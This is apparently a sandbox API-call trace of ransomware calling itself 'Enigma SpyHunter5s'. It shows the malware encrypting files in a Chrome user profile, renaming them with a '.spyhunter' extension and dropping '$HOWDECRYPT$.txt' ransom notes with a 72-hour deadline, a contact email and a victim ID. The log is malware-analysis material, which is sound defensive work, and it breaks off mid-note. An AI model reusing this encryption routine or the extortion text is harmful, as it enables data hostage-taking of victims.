CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Network Action Predictor" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\network action predictor"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0156.564] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Network Action Predictor") returned 104 [0156.564] StrStrW (lpFirst="Network Action Predictor", lpSrch=".txt") returned 0x0 [0156.564] GetProcessHeap () returned 0x2c0000 [0156.565] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0156.565] ReadFile (in: hFile=0xb0, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270eb04, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x270eb04*=0x2800, lpOverlapped=0x0) returned 1 [0156.624] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0156.624] WriteFile (in: hFile=0xb0, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270eb04, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x270eb04*=0x2800, lpOverlapped=0x0) returned 1 [0156.624] GetProcessHeap () returned 0x2c0000 [0156.624] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0156.624] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0156.624] WriteFile (in: hFile=0xb0, lpBuffer=0x270eb44*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270eb04, lpOverlapped=0x0 | out: lpBuffer=0x270eb44*, lpNumberOfBytesWritten=0x270eb04*=0x4, lpOverlapped=0x0) returned 1 [0156.780] WriteFile (in: hFile=0xb0, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270eb04, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x270eb04*=0x30, lpOverlapped=0x0) returned 1 [0156.780] CloseHandle (hObject=0xb0) returned 1 [0156.780] GetProcessHeap () returned 0x2c0000 [0156.780] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0156.780] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Network Action Predictor.spyhunter") returned 114 [0156.780] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Network Action Predictor" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\network action predictor"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Network Action Predictor.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\network action predictor.spyhunter")) returned 1 [0156.781] GetProcessHeap () returned 0x2c0000 [0156.781] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0156.781] GetProcessHeap () returned 0x2c0000 [0156.781] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0156.781] GetProcessHeap () returned 0x2c0000 [0156.782] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f4a320 | out: hHeap=0x2c0000) returned 1 [0156.782] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270eb40 | out: pbBuffer=0x270eb40) returned 1 [0156.782] GetProcessHeap () returned 0x2c0000 [0156.782] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0156.782] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x270eb38*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x270eb38*=0x30) returned 1 [0156.782] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Favicons-journal" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\favicons-journal"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0156.783] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Favicons-journal") returned 96 [0156.783] StrStrW (lpFirst="Favicons-journal", lpSrch=".txt") returned 0x0 [0156.783] GetProcessHeap () returned 0x2c0000 [0156.783] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0156.783] ReadFile (in: hFile=0xb0, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270eafc, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x270eafc*=0x0, lpOverlapped=0x0) returned 1 [0156.783] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0156.783] WriteFile (in: hFile=0xb0, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x270eafc, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x270eafc*=0x0, lpOverlapped=0x0) returned 1 [0156.783] GetProcessHeap () returned 0x2c0000 [0156.783] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0156.783] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0156.783] WriteFile (in: hFile=0xb0, lpBuffer=0x270eb3c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270eafc, lpOverlapped=0x0 | out: lpBuffer=0x270eb3c*, lpNumberOfBytesWritten=0x270eafc*=0x4, lpOverlapped=0x0) returned 1 [0156.784] WriteFile (in: hFile=0xb0, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270eafc, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x270eafc*=0x30, lpOverlapped=0x0) returned 1 [0156.784] CloseHandle (hObject=0xb0) returned 1 [0156.784] GetProcessHeap () returned 0x2c0000 [0156.784] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0156.784] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Favicons-journal.spyhunter") returned 106 [0156.784] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Favicons-journal" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\favicons-journal"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Favicons-journal.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\favicons-journal.spyhunter")) returned 1 [0156.786] GetProcessHeap () returned 0x2c0000 [0156.786] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0156.786] GetProcessHeap () returned 0x2c0000 [0156.787] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0156.787] GetProcessHeap () returned 0x2c0000 [0156.787] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f299d0 | out: hHeap=0x2c0000) returned 1 [0156.787] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270eb40 | out: pbBuffer=0x270eb40) returned 1 [0156.787] GetProcessHeap () returned 0x2c0000 [0156.787] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0156.787] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x270eb38*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x270eb38*=0x30) returned 1 [0156.787] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Favicons" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\favicons"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0156.788] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Favicons") returned 88 [0156.788] StrStrW (lpFirst="Favicons", lpSrch=".txt") returned 0x0 [0156.788] GetProcessHeap () returned 0x2c0000 [0156.788] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0156.788] ReadFile (in: hFile=0xb0, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270eafc, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x270eafc*=0x2800, lpOverlapped=0x0) returned 1 [0156.831] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0156.831] WriteFile (in: hFile=0xb0, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270eafc, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x270eafc*=0x2800, lpOverlapped=0x0) returned 1 [0156.832] GetProcessHeap () returned 0x2c0000 [0156.832] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0156.832] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0156.832] WriteFile (in: hFile=0xb0, lpBuffer=0x270eb3c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270eafc, lpOverlapped=0x0 | out: lpBuffer=0x270eb3c*, lpNumberOfBytesWritten=0x270eafc*=0x4, lpOverlapped=0x0) returned 1 [0156.832] WriteFile (in: hFile=0xb0, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270eafc, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x270eafc*=0x30, lpOverlapped=0x0) returned 1 [0156.832] CloseHandle (hObject=0xb0) returned 1 [0156.832] GetProcessHeap () returned 0x2c0000 [0156.832] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0156.832] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Favicons.spyhunter") returned 98 [0156.832] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Favicons" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\favicons"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Favicons.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\favicons.spyhunter")) returned 1 [0156.833] GetProcessHeap () returned 0x2c0000 [0156.833] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0156.833] GetProcessHeap () returned 0x2c0000 [0156.833] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0156.833] GetProcessHeap () returned 0x2c0000 [0156.833] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f44728 | out: hHeap=0x2c0000) returned 1 [0156.833] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270eb38 | out: pbBuffer=0x270eb38) returned 1 [0156.833] GetProcessHeap () returned 0x2c0000 [0156.834] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0156.834] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x270eb30*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x270eb30*=0x30) returned 1 [0156.834] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_metadata\\computed_hashes.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_metadata\\computed_hashes.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0156.860] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_metadata\\computed_hashes.json") returned 169 [0156.860] StrStrW (lpFirst="computed_hashes.json", lpSrch=".txt") returned 0x0 [0156.860] GetProcessHeap () returned 0x2c0000 [0156.860] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0156.860] ReadFile (in: hFile=0x178, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270eaf4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x270eaf4*=0x2800, lpOverlapped=0x0) returned 1 [0157.008] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0157.009] WriteFile (in: hFile=0x178, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270eaf4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x270eaf4*=0x2800, lpOverlapped=0x0) returned 1 [0157.009] GetProcessHeap () returned 0x2c0000 [0157.009] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0157.009] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0157.010] WriteFile (in: hFile=0x178, lpBuffer=0x270eb34*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270eaf4, lpOverlapped=0x0 | out: lpBuffer=0x270eb34*, lpNumberOfBytesWritten=0x270eaf4*=0x4, lpOverlapped=0x0) returned 1 [0157.010] WriteFile (in: hFile=0x178, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270eaf4, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x270eaf4*=0x30, lpOverlapped=0x0) returned 1 [0157.010] CloseHandle (hObject=0x178) returned 1 [0157.010] GetProcessHeap () returned 0x2c0000 [0157.010] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0157.010] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_metadata\\computed_hashes.json.spyhunter") returned 179 [0157.010] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_metadata\\computed_hashes.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_metadata\\computed_hashes.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_metadata\\computed_hashes.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_metadata\\computed_hashes.json.spyhunter")) returned 1 [0157.011] GetProcessHeap () returned 0x2c0000 [0157.011] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0157.012] GetProcessHeap () returned 0x2c0000 [0157.012] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0157.012] GetProcessHeap () returned 0x2c0000 [0157.013] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cf0050 | out: hHeap=0x2c0000) returned 1 [0157.013] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\uk\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\uk\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0157.014] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0157.014] WriteFile (in: hFile=0x178, lpBuffer=0x270ea6b*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x270eb94, lpOverlapped=0x0 | out: lpBuffer=0x270ea6b*, lpNumberOfBytesWritten=0x270eb94*=0x127, lpOverlapped=0x0) returned 1 [0157.015] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0157.015] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x270eb94, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x270eb94*=0x2ac, lpOverlapped=0x0) returned 1 [0157.015] CloseHandle (hObject=0x178) returned 1 [0157.016] GetProcessHeap () returned 0x2c0000 [0157.016] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb9860 | out: hHeap=0x2c0000) returned 1 [0157.016] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270eb30 | out: pbBuffer=0x270eb30) returned 1 [0157.016] GetProcessHeap () returned 0x2c0000 [0157.016] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0157.016] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x270eb28*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x270eb28*=0x30) returned 1 [0157.016] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\uk\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\uk\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0157.016] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\uk\\messages.json") returned 164 [0157.017] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0157.017] GetProcessHeap () returned 0x2c0000 [0157.017] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0157.017] ReadFile (in: hFile=0x178, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270eaec, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x270eaec*=0x2800, lpOverlapped=0x0) returned 1 [0157.032] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0157.033] WriteFile (in: hFile=0x178, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270eaec, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x270eaec*=0x2800, lpOverlapped=0x0) returned 1 [0157.033] GetProcessHeap () returned 0x2c0000 [0157.033] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0157.033] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0157.033] WriteFile (in: hFile=0x178, lpBuffer=0x270eb2c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270eaec, lpOverlapped=0x0 | out: lpBuffer=0x270eb2c*, lpNumberOfBytesWritten=0x270eaec*=0x4, lpOverlapped=0x0) returned 1 [0157.173] WriteFile (in: hFile=0x178, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270eaec, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x270eaec*=0x30, lpOverlapped=0x0) returned 1 [0157.173] CloseHandle (hObject=0x178) returned 1 [0157.173] GetProcessHeap () returned 0x2c0000 [0157.173] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0157.174] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\uk\\messages.json.spyhunter") returned 174 [0157.174] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\uk\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\uk\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\uk\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\uk\\messages.json.spyhunter")) returned 1 [0157.190] GetProcessHeap () returned 0x2c0000 [0157.190] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0157.190] GetProcessHeap () returned 0x2c0000 [0157.190] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0157.190] GetProcessHeap () returned 0x2c0000 [0157.190] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb96c8 | out: hHeap=0x2c0000) returned 1 [0157.190] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sl\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sl\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0157.191] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional 